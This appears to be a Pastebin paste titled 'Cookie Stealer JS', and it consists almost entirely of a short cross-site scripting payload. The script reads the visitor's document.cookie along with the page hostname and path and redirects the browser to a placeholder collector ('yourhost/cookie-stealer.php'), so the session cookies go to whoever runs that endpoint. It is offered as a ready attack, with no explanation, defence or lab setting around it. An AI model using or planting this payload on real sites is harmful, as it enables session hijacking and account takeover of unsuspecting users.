VanGans

Cookie Stealer JS

Apr 14th, 2019
176
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <script type="text/javascript">
  2. var url = 'http://yourhost/cookie-stealer.php'+'?c='+document.cookie+'&w='+document.location.hostname+'&p='+document.location.pathname;
  3. document.location = url;
  4. </script>
Add Comment
Please, Sign In to add comment